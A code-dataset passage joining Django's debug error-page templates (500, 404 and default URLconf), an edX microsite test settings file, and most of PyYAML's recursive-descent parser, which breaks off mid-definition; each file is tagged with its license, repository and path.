class="exception_value">""" """{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}""" """</pre> <table class="meta"> {% if request %} <tr> <th>Request Method:</th> <td>{{ request.META.REQUEST_METHOD }}</td> </tr> <tr> <th>Request URL:</th> <td>{{ request.build_absolute_uri|escape }}</td> </tr> {% endif %} <tr> <th>Django Version:</th> <td>{{ django_version_info }}</td> </tr> {% if exception_type %} <tr> <th>Exception Type:</th> <td>{{ exception_type }}</td> </tr> {% endif %} {% if exception_type and exception_value %} <tr> <th>Exception Value:</th> <td><pre>{{ exception_value|force_escape }}</pre></td> </tr> {% endif %} {% if lastframe %} <tr> <th>Exception Location:</th> <td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td> </tr> {% endif %} <tr> <th>Python Executable:</th> <td>{{ sys_executable|escape }}</td> </tr> <tr> <th>Python Version:</th> <td>{{ sys_version_info }}</td> </tr> <tr> <th>Python Path:</th> <td><pre>{{ sys_path|pprint }}</pre></td> </tr> <tr> <th>Server time:</th> <td>{{server_time|date:"r"}}</td> </tr> </table> </div> {% if unicode_hint %} <div id="unicode-hint"> <h2>Unicode error hint</h2> <p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p> </div> {% endif %} {% if template_does_not_exist %} <div id="template-not-exist"> <h2>Template-loader postmortem</h2> {% if postmortem %} <p class="append-bottom">Django tried loading these templates, in this order:</p> {% for entry in postmortem %} <p class="postmortem-section">Using engine <code>{{ entry.backend.name }}</code>:</p> <ul> {% if entry.tried %} {% for attempt in entry.tried %} <li><code>{{ attempt.0.loader_name }}</code>: {{ attempt.0.name }} ({{ attempt.1 }})</li> {% endfor %} </ul> {% else %} <li>This engine did not provide a list of tried templates.</li> {% endif %} </ul> {% endfor %} {% else %} <p>No templates were found because your 'TEMPLATES' setting is not configured.</p> {% endif %} </div> {% endif %} {% if template_info %} <div id="template"> <h2>Error during template rendering</h2> <p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p> <h3>{{ template_info.message }}</h3> <table class="source{% if template_info.top %} cut-top{% endif %} {% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}"> {% for source_line in template_info.source_lines %} {% ifequal source_line.0 template_info.line %} <tr class="error"><th>{{ source_line.0 }}</th> <td>{{ template_info.before }}""" """<span class="specific">{{ template_info.during }}</span>""" """{{ template_info.after }}</td> </tr> {% else %} <tr><th>{{ source_line.0 }}</th> <td>{{ source_line.1 }}</td></tr> {% endifequal %} {% endfor %} </table> </div> {% endif %} {% if frames %} <div id="traceback"> <h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);"> Switch to copy-and-paste view</a></span>{% endif %} </h2> {% autoescape off %} <div id="browserTraceback"> <ul class="traceback"> {% for frame in frames %} {% ifchanged frame.exc_cause %}{% if frame.exc_cause %} <li><h3> {% if frame.exc_cause_explicit %} The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception: {% else %} During handling of the above exception ({{ frame.exc_cause }}), another exception occurred: {% endif %} </h3></li> {% endif %}{% endifchanged %} <li class="frame {{ frame.type }}"> <code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code> {% if frame.context_line %} <div class="context" id="c{{ frame.id }}"> {% if frame.pre_context and not is_email %} <ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}"> {% for line in frame.pre_context %} <li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li> {% endfor %} </ol> {% endif %} <ol start="{{ frame.lineno }}" class="context-line"> <li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre> """ """{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol> {% if frame.post_context and not is_email %} <ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}"> {% for line in frame.post_context %} <li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li> {% endfor %} </ol> {% endif %} </div> {% endif %} {% if frame.vars %} <div class="commands"> {% if is_email %} <h2>Local Vars</h2> {% else %} <a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>&#x25b6;</span> Local vars</a> {% endif %} </div> <table class="vars" id="v{{ frame.id }}"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in frame.vars|dictsort:"0" %} <tr> <td>{{ var.0|force_escape }}</td> <td class="code"><pre>{{ var.1 }}</pre></td> </tr> {% endfor %} </tbody> </table> {% endif %} </li> {% endfor %} </ul> </div> {% endautoescape %} <form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post"> {% if not is_email %} <div id="pastebinTraceback" class="pastebin"> <input type="hidden" name="language" value="PythonConsole"> <input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}"> <input type="hidden" name="source" value="Django Dpaste Agent"> <input type="hidden" name="poster" value="Django"> <textarea name="content" id="traceback_area" cols="140" rows="25"> Environment: {% if request %} Request Method: {{ request.META.REQUEST_METHOD }} Request URL: {{ request.build_absolute_uri|escape }} {% endif %} Django Version: {{ django_version_info }} Python Version: {{ sys_version_info }} Installed Applications: {{ settings.INSTALLED_APPS|pprint }} Installed Middleware: {{ settings.MIDDLEWARE_CLASSES|pprint }} {% if template_does_not_exist %}Template loader postmortem {% if postmortem %}Django tried loading these templates, in this order: {% for entry in postmortem %} Using engine {{ entry.backend.name }}: {% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }}) {% endfor %}{% else %} This engine did not provide a list of tried templates. {% endif %}{% endfor %} {% else %}No templates were found because your 'TEMPLATES' setting is not configured. {% endif %} {% endif %}{% if template_info %} Template error: In template {{ template_info.name }}, error at line {{ template_info.line }} {{ template_info.message }}""" "{% for source_line in template_info.source_lines %}" "{% ifequal source_line.0 template_info.line %}" " {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}" "{% else %}" " {{ source_line.0 }} : {{ source_line.1 }}" """{% endifequal %}{% endfor %}{% endif %} Traceback:{% for frame in frames %} {% ifchanged frame.exc_cause %}{% if frame.exc_cause %}{% if frame.exc_cause_explicit %} The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception: {% else %} During handling of the above exception ({{ frame.exc_cause }}), another exception occurred: {% endif %}{% endif %}{% endifchanged %} File "{{ frame.filename|escape }}" in {{ frame.function|escape }} {% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}{% endfor %} Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %} Exception Value: {{ exception_value|force_escape }} </textarea> <br><br> <input type="submit" value="Share this traceback on a public Web site"> </div> </form> </div> {% endif %} {% endif %} <div id="requestinfo"> <h2>Request information</h2> {% if request %} <h3 id="get-info">GET</h3> {% if request.GET %} <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in request.GET.items %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> {% else %} <p>No GET data</p> {% endif %} <h3 id="post-info">POST</h3> {% if filtered_POST %} <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in filtered_POST.items %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> {% else %} <p>No POST data</p> {% endif %} <h3 id="files-info">FILES</h3> {% if request.FILES %} <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in request.FILES.items %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> {% else %} <p>No FILES data</p> {% endif %} <h3 id="cookie-info">COOKIES</h3> {% if request.COOKIES %} <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in request.COOKIES.items %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> {% else %} <p>No cookie data</p> {% endif %} <h3 id="meta-info">META</h3> <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> {% for var in request.META.items|dictsort:"0" %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> {% else %} <p>Request data not supplied</p> {% endif %} <h3 id="settings-info">Settings</h3> <h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4> <table class="req"> <thead> <tr> <th>Setting</th> <th>Value</th> </tr> </thead> <tbody> {% for var in settings.items|dictsort:"0" %} <tr> <td>{{ var.0 }}</td> <td class="code"><pre>{{ var.1|pprint }}</pre></td> </tr> {% endfor %} </tbody> </table> </div> {% if not is_email %} <div id="explanation"> <p> You're seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard page generated by the handler for this status code. </p> </div> {% endif %} </body> </html> """) TECHNICAL_500_TEXT_TEMPLATE = ("""{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %} {% firstof exception_value 'No exception message supplied' %} {% if request %} Request Method: {{ request.META.REQUEST_METHOD }} Request URL: {{ request.build_absolute_uri }}{% endif %} Django Version: {{ django_version_info }} Python Executable: {{ sys_executable }} Python Version: {{ sys_version_info }} Python Path: {{ sys_path }} Server time: {{server_time|date:"r"}} Installed Applications: {{ settings.INSTALLED_APPS|pprint }} Installed Middleware: {{ settings.MIDDLEWARE_CLASSES|pprint }} {% if template_does_not_exist %}Template loader postmortem {% if postmortem %}Django tried loading these templates, in this order: {% for entry in postmortem %} Using engine {{ entry.backend.name }}: {% if entry.tried %}{% for attempt in entry.tried %} * {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }}) {% endfor %}{% else %} This engine did not provide a list of tried templates. {% endif %}{% endfor %} {% else %}No templates were found because your 'TEMPLATES' setting is not configured. {% endif %} {% endif %}{% if template_info %} Template error: In template {{ template_info.name }}, error at line {{ template_info.line }} {{ template_info.message }} {% for source_line in template_info.source_lines %}""" "{% ifequal source_line.0 template_info.line %}" " {{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}" "{% else %}" " {{ source_line.0 }} : {{ source_line.1 }}" """{% endifequal %}{% endfor %}{% endif %}{% if frames %} Traceback:""" "{% for frame in frames %}" "{% ifchanged frame.exc_cause %}" " {% if frame.exc_cause %}" """ {% if frame.exc_cause_explicit %} The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception: {% else %} During handling of the above exception ({{ frame.exc_cause }}), another exception occurred: {% endif %} {% endif %} {% endifchanged %} File "{{ frame.filename }}" in {{ frame.function }} {% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %} {% endfor %} {% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %} {% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %} {% if request %}Request information: GET:{% for k, v in request.GET.items %} {{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %} POST:{% for k, v in filtered_POST.items %} {{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %} FILES:{% for k, v in request.FILES.items %} {{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %} COOKIES:{% for k, v in request.COOKIES.items %} {{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %} META:{% for k, v in request.META.items|dictsort:"0" %} {{ k }} = {{ v|stringformat:"r" }}{% endfor %} {% else %}Request data not supplied {% endif %} Settings: Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %} {{ k }} = {{ v|stringformat:"r" }}{% endfor %} {% if not is_email %} You're seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard page generated by the handler for this status code. {% endif %} """) TECHNICAL_404_TEMPLATE = """ <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at {{ request.path_info|escape }}</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; background:#eee; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; } table { border:none; border-collapse: collapse; width:100%; } td, th { vertical-align:top; padding:2px 3px; } th { width:12em; text-align:right; color:#666; padding-right:.5em; } #info { background:#f6f6f6; } #info ol { margin: 0.5em 4em; } #info ol li { font-family: monospace; } #summary { background: #ffc; } #explanation { background:#eee; border-bottom: 0px none; } </style> </head> <body> <div id="summary"> <h1>Page not found <span>(404)</span></h1> <table class="meta"> <tr> <th>Request Method:</th> <td>{{ request.META.REQUEST_METHOD }}</td> </tr> <tr> <th>Request URL:</th> <td>{{ request.build_absolute_uri|escape }}</td> </tr> {% if raising_view_name %} <tr> <th>Raised by:</th> <td>{{ raising_view_name }}</td> </tr> {% endif %} </table> </div> <div id="info"> {% if urlpatterns %} <p> Using the URLconf defined in <code>{{ urlconf }}</code>, Django tried these URL patterns, in this order: </p> <ol> {% for pattern in urlpatterns %} <li> {% for pat in pattern %} {{ pat.regex.pattern }} {% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %} {% endfor %} </li> {% endfor %} </ol> <p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p> {% else %} <p>{{ reason }}</p> {% endif %} </div> <div id="explanation"> <p> You're seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard 404 page. </p> </div> </body> </html> """ DEFAULT_URLCONF_TEMPLATE = """ <!DOCTYPE html> <html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="NONE,NOARCHIVE"><title>{{ title }}</title> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; } h2 { margin-bottom:.8em; } h2 span { font-size:80%; color:#666; font-weight:normal; } h3 { margin:1em 0 .5em 0; } h4 { margin:0 0 .5em 0; font-weight: normal; } table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; } tbody td, tbody th { vertical-align:top; padding:2px 3px; } thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; } tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; } #summary { background: #e0ebff; } #summary h2 { font-weight: normal; color: #666; } #explanation { background:#eee; } #instructions { background:#f6f6f6; } #summary table { border:none; background:transparent; } </style> </head> <body> <div id="summary"> <h1>{{ heading }}</h1> <h2>{{ subheading }}</h2> </div> <div id="instructions"> <p> {{ instructions|safe }} </p> </div> <div id="explanation"> <p> {{ explanation|safe }} </p> </div> </body></html> """
bsd-3-clause
SivilTaram/edx-platform
lms/envs/cms/microsite_test.py
110
1675
""" This is a localdev test for the Microsite processing pipeline """ # We intentionally define lots of variables that aren't used, and # want to import all variables from base settings files # pylint: disable=wildcard-import, unused-wildcard-import # Pylint gets confused by path.py instances, which report themselves as class # objects. As a result, pylint applies the wrong regex in validating names, # and throws spurious errors. Therefore, we disable invalid-name checking. # pylint: disable=invalid-name from .dev import * from ..dev import ENV_ROOT, FEATURES MICROSITE_CONFIGURATION = { "openedx": { "domain_prefix": "openedx", "university": "openedx", "platform_name": "Open edX", "logo_image_url": "openedx/images/header-logo.png", "email_from_address": "[email protected]", "payment_support_email": "[email protected]", "ENABLE_MKTG_SITE": False, "SITE_NAME": "openedx.localhost", "course_org_filter": "CDX", "course_about_show_social_links": False, "css_overrides_file": "openedx/css/openedx.css", "show_partners": False, "show_homepage_promo_video": False, "course_index_overlay_text": "Explore free courses from leading universities.", "course_index_overlay_logo_file": "openedx/images/header-logo.png", "homepage_overlay_html": "<h1>Take an Open edX Course</h1>" } } MICROSITE_ROOT_DIR = ENV_ROOT / 'edx-microsite' # pretend we are behind some marketing site, we want to be able to assert that the Microsite config values override # this global setting FEATURES['ENABLE_MKTG_SITE'] = True FEATURES['USE_MICROSITES'] = True
agpl-3.0
sjsucohort6/openstack
python/venv/lib/python2.7/site-packages/yaml/parser.py
409
25542
# The following YAML grammar is LL(1) and is parsed by a recursive descent # parser. # # stream ::= STREAM-START implicit_document? explicit_document* STREAM-END # implicit_document ::= block_node DOCUMENT-END* # explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END* # block_node_or_indentless_sequence ::= # ALIAS # | properties (block_content | indentless_block_sequence)? # | block_content # | indentless_block_sequence # block_node ::= ALIAS # | properties block_content? # | block_content # flow_node ::= ALIAS # | properties flow_content? # | flow_content # properties ::= TAG ANCHOR? | ANCHOR TAG? # block_content ::= block_collection | flow_collection | SCALAR # flow_content ::= flow_collection | SCALAR # block_collection ::= block_sequence | block_mapping # flow_collection ::= flow_sequence | flow_mapping # block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END # indentless_sequence ::= (BLOCK-ENTRY block_node?)+ # block_mapping ::= BLOCK-MAPPING_START # ((KEY block_node_or_indentless_sequence?)? # (VALUE block_node_or_indentless_sequence?)?)* # BLOCK-END # flow_sequence ::= FLOW-SEQUENCE-START # (flow_sequence_entry FLOW-ENTRY)* # flow_sequence_entry? # FLOW-SEQUENCE-END # flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)? # flow_mapping ::= FLOW-MAPPING-START # (flow_mapping_entry FLOW-ENTRY)* # flow_mapping_entry? # FLOW-MAPPING-END # flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)? # # FIRST sets: # # stream: { STREAM-START } # explicit_document: { DIRECTIVE DOCUMENT-START } # implicit_document: FIRST(block_node) # block_node: { ALIAS TAG ANCHOR SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START } # flow_node: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START } # block_content: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR } # flow_content: { FLOW-SEQUENCE-START FLOW-MAPPING-START SCALAR } # block_collection: { BLOCK-SEQUENCE-START BLOCK-MAPPING-START } # flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START } # block_sequence: { BLOCK-SEQUENCE-START } # block_mapping: { BLOCK-MAPPING-START } # block_node_or_indentless_sequence: { ALIAS ANCHOR TAG SCALAR BLOCK-SEQUENCE-START BLOCK-MAPPING-START FLOW-SEQUENCE-START FLOW-MAPPING-START BLOCK-ENTRY } # indentless_sequence: { ENTRY } # flow_collection: { FLOW-SEQUENCE-START FLOW-MAPPING-START } # flow_sequence: { FLOW-SEQUENCE-START } # flow_mapping: { FLOW-MAPPING-START } # flow_sequence_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY } # flow_mapping_entry: { ALIAS ANCHOR TAG SCALAR FLOW-SEQUENCE-START FLOW-MAPPING-START KEY } __all__ = ['Parser', 'ParserError'] from error import MarkedYAMLError from tokens import * from events import * from scanner import * class ParserError(MarkedYAMLError): pass class Parser(object): # Since writing a recursive-descendant parser is a straightforward task, we # do not give many comments here. DEFAULT_TAGS = { u'!': u'!', u'!!': u'tag:yaml.org,2002:', } def __init__(self): self.current_event = None self.yaml_version = None self.tag_handles = {} self.states = [] self.marks = [] self.state = self.parse_stream_start def dispose(self): # Reset the state attributes (to clear self-references) self.states = [] self.state = None def check_event(self, *choices): # Check the type of the next event. if self.current_event is None: if self.state: self.current_event = self.state() if self.current_event is not None: if not choices: return True for choice in choices: if isinstance(self.current_event, choice): return True return False def peek_event(self): # Get the next event. if self.current_event is None: if self.state: self.current_event = self.state() return self.current_event def get_event(self): # Get the next event and proceed further. if self.current_event is None: if self.state: self.current_event = self.state() value = self.current_event self.current_event = None return value # stream ::= STREAM-START implicit_document? explicit_document* STREAM-END # implicit_document ::= block_node DOCUMENT-END* # explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END* def parse_stream_start(self): # Parse the stream start. token = self.get_token() event = StreamStartEvent(token.start_mark, token.end_mark, encoding=token.encoding) # Prepare the next state. self.state = self.parse_implicit_document_start return event def parse_implicit_document_start(self): # Parse an implicit document. if not self.check_token(DirectiveToken, DocumentStartToken, StreamEndToken): self.tag_handles = self.DEFAULT_TAGS token = self.peek_token() start_mark = end_mark = token.start_mark event = DocumentStartEvent(start_mark, end_mark, explicit=False) # Prepare the next state. self.states.append(self.parse_document_end) self.state = self.parse_block_node return event else: return self.parse_document_start() def parse_document_start(self): # Parse any extra document end indicators. while self.check_token(DocumentEndToken): self.get_token() # Parse an explicit document. if not self.check_token(StreamEndToken): token = self.peek_token() start_mark = token.start_mark version, tags = self.process_directives() if not self.check_token(DocumentStartToken): raise ParserError(None, None, "expected '<document start>', but found %r" % self.peek_token().id, self.peek_token().start_mark) token = self.get_token() end_mark = token.end_mark event = DocumentStartEvent(start_mark, end_mark, explicit=True, version=version, tags=tags) self.states.append(self.parse_document_end) self.state = self.parse_document_content else: # Parse the end of the stream. token = self.get_token() event = StreamEndEvent(token.start_mark, token.end_mark) assert not self.states assert not self.marks self.state = None return event def parse_document_end(self): # Parse the document end. token = self.peek_token() start_mark = end_mark = token.start_mark explicit = False if self.check_token(DocumentEndToken): token = self.get_token() end_mark = token.end_mark explicit = True event = DocumentEndEvent(start_mark, end_mark, explicit=explicit) # Prepare the next state. self.state = self.parse_document_start return event def parse_document_content(self): if self.check_token(DirectiveToken, DocumentStartToken, DocumentEndToken, StreamEndToken): event = self.process_empty_scalar(self.peek_token().start_mark) self.state = self.states.pop() return event else: return self.parse_block_node() def process_directives(self): self.yaml_version = None self.tag_handles = {} while self.check_token(DirectiveToken): token = self.get_token() if token.name == u'YAML': if self.yaml_version is not None: raise ParserError(None, None, "found duplicate YAML directive", token.start_mark) major, minor = token.value if major != 1: raise ParserError(None, None, "found incompatible YAML document (version 1.* is required)", token.start_mark) self.yaml_version = token.value elif token.name == u'TAG': handle, prefix = token.value if handle in self.tag_handles: raise ParserError(None, None, "duplicate tag handle %r" % handle.encode('utf-8'), token.start_mark) self.tag_handles[handle] = prefix if self.tag_handles: value = self.yaml_version, self.tag_handles.copy() else: value = self.yaml_version, None for key in self.DEFAULT_TAGS: if key not in self.tag_handles: self.tag_handles[key] = self.DEFAULT_TAGS[key] return value # block_node_or_indentless_sequence ::= ALIAS # | properties (block_content | indentless_block_sequence)? # | block_content # | indentless_block_sequence # block_node ::= ALIAS # | properties block_content? # | block_content # flow_node ::= ALIAS # | properties flow_content? # | flow_content # properties ::= TAG ANCHOR? | ANCHOR TAG? # block_content ::= block_collection | flow_collection | SCALAR # flow_content ::= flow_collection | SCALAR # block_collection ::= block_sequence | block_mapping # flow_collection ::= flow_sequence | flow_mapping def parse_block_node(self): return self.parse_node(block=True) def parse_flow_node(self): return self.parse_node() def parse_block_node_or_indentless_sequence(self): return self.parse_node(block=True, indentless_sequence=True) def parse_node(self, block=False, indentless_sequence=False): if self.check_token(AliasToken): token = self.get_token() event = AliasEvent(token.value, token.start_mark, token.end_mark) self.state = self.states.pop() else: anchor = None tag = None start_mark = end_mark = tag_mark = None if self.check_token(AnchorToken): token = self.get_token() start_mark = token.start_mark end_mark = token.end_mark anchor = token.value if self.check_token(TagToken): token = self.get_token() tag_mark = token.start_mark end_mark = token.end_mark tag = token.value elif self.check_token(TagToken): token = self.get_token() start_mark = tag_mark = token.start_mark end_mark = token.end_mark tag = token.value if self.check_token(AnchorToken): token = self.get_token() end_mark = token.end_mark anchor = token.value if tag is not None: handle, suffix = tag if handle is not None: if handle not in self.tag_handles: raise ParserError("while parsing a node", start_mark, "found undefined tag handle %r" % handle.encode('utf-8'), tag_mark) tag = self.tag_handles[handle]+suffix else: tag = suffix #if tag == u'!': # raise ParserError("while parsing a node", start_mark, # "found non-specific tag '!'", tag_mark, # "Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.") if start_mark is None: start_mark = end_mark = self.peek_token().start_mark event = None implicit = (tag is None or tag == u'!') if indentless_sequence and self.check_token(BlockEntryToken): end_mark = self.peek_token().end_mark event = SequenceStartEvent(anchor, tag, implicit, start_mark, end_mark) self.state = self.parse_indentless_sequence_entry else: if self.check_token(ScalarToken): token = self.get_token() end_mark = token.end_mark if (token.plain and tag is None) or tag == u'!': implicit = (True, False) elif tag is None: implicit = (False, True) else: implicit = (False, False) event = ScalarEvent(anchor, tag, implicit, token.value, start_mark, end_mark, style=token.style) self.state = self.states.pop() elif self.check_token(FlowSequenceStartToken): end_mark = self.peek_token().end_mark event = SequenceStartEvent(anchor, tag, implicit, start_mark, end_mark, flow_style=True) self.state = self.parse_flow_sequence_first_entry elif self.check_token(FlowMappingStartToken): end_mark = self.peek_token().end_mark event = MappingStartEvent(anchor, tag, implicit, start_mark, end_mark, flow_style=True) self.state = self.parse_flow_mapping_first_key elif block and self.check_token(BlockSequenceStartToken): end_mark = self.peek_token().start_mark event = SequenceStartEvent(anchor, tag, implicit, start_mark, end_mark, flow_style=False) self.state = self.parse_block_sequence_first_entry elif block and self.check_token(BlockMappingStartToken): end_mark = self.peek_token().start_mark event = MappingStartEvent(anchor, tag, implicit, start_mark, end_mark, flow_style=False) self.state = self.parse_block_mapping_first_key elif anchor is not None or tag is not None: # Empty scalars are allowed even if a tag or an anchor is # specified. event = ScalarEvent(anchor, tag, (implicit, False), u'', start_mark, end_mark) self.state = self.states.pop() else: if block: node = 'block' else: node = 'flow' token = self.peek_token() raise ParserError("while parsing a %s node" % node, start_mark, "expected the node content, but found %r" % token.id, token.start_mark) return event # block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END def parse_block_sequence_first_entry(self): token = self.get_token() self.marks.append(token.start_mark) return self.parse_block_sequence_entry() def parse_block_sequence_entry(self): if self.check_token(BlockEntryToken): token = self.get_token() if not self.check_token(BlockEntryToken, BlockEndToken): self.states.append(self.parse_block_sequence_entry) return self.parse_block_node() else: self.state = self.parse_block_sequence_entry return self.process_empty_scalar(token.end_mark) if not self.check_token(BlockEndToken): token = self.peek_token() raise ParserError("while parsing a block collection", self.marks[-1], "expected <block end>, but found %r" % token.id, token.start_mark) token = self.get_token() event = SequenceEndEvent(token.start_mark, token.end_mark) self.state = self.states.pop() self.marks.pop() return event # indentless_sequence ::= (BLOCK-ENTRY block_node?)+ def parse_indentless_sequence_entry(self): if self.check_token(BlockEntryToken): token = self.get_token() if not self.check_token(BlockEntryToken, KeyToken, ValueToken, BlockEndToken): self.states.append(self.parse_indentless_sequence_entry) return self.parse_block_node() else: self.state = self.parse_indentless_sequence_entry return self.process_empty_scalar(token.end_mark) token = self.peek_token() event = SequenceEndEvent(token.start_mark, token.start_mark) self.state = self.states.pop() return event # block_mapping ::= BLOCK-MAPPING_START # ((KEY block_node_or_indentless_sequence?)? # (VALUE block_node_or_indentless_sequence?)?)* # BLOCK-END def parse_block_mapping_first_key(self): token = self.get_token() self.marks.append(token.start_mark) return self.parse_block_mapping_key() def parse_block_mapping_key(self): if self.check_token(KeyToken): token = self.get_token() if not self.check_token(KeyToken, ValueToken, BlockEndToken): self.states.append(self.parse_block_mapping_value) return self.parse_block_node_or_indentless_sequence() else: self.state = self.parse_block_mapping_value return self.process_empty_scalar(token.end_mark) if not self.check_token(BlockEndToken): token = self.peek_token() raise ParserError("while parsing a block mapping", self.marks[-1], "expected <block end>, but found %r" % token.id, token.start_mark) token = self.get_token() event = MappingEndEvent(token.start_mark, token.end_mark) self.state = self.states.pop() self.marks.pop() return event def parse_block_mapping_value(self): if self.check_token(ValueToken): token = self.get_token() if not self.check_token(KeyToken, ValueToken, BlockEndToken): self.states.append(self.parse_block_mapping_key) return self.parse_block_node_or_indentless_sequence() else: self.state = self.parse_block_mapping_key return self.process_empty_scalar(token.end_mark) else: self.state = self.parse_block_mapping_key token = self.peek_token() return self.process_empty_scalar(token.start_mark) # flow_sequence ::= FLOW-SEQUENCE-START # (flow_sequence_entry FLOW-ENTRY)* # flow_sequence_entry? # FLOW-SEQUENCE-END # flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)? # # Note that while production rules for both flow_sequence_entry and # flow_mapping_entry are equal, their interpretations are different. # For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?` # generate an inline mapping (set syntax). def parse_flow_sequence_first_entry(self): token = self.get_token() self.marks.append(token.start_mark) return self.parse_flow_sequence_entry(first=True) def parse_flow_sequence_entry(self, first=False): if not self.check_token(FlowSequenceEndToken): if not first: if self.check_token(FlowEntryToken): self.get_token() else: token = self.peek_token() raise ParserError("while parsing a flow sequence", self.marks[-1], "expected ',' or ']', but got %r" % token.id, token.start_mark) if self.check_token(KeyToken): token = self.peek_token() event = MappingStartEvent(None, None, True, token.start_mark, token.end_mark, flow_style=True) self.state = self.parse_flow_sequence_entry_mapping_key return event elif not self.check_token(FlowSequenceEndToken): self.states.append(self.parse_flow_sequence_entry) return self.parse_flow_node() token = self.get_token() event = SequenceEndEvent(token.start_mark, token.end_mark) self.state = self.states.pop() self.marks.pop() return event def 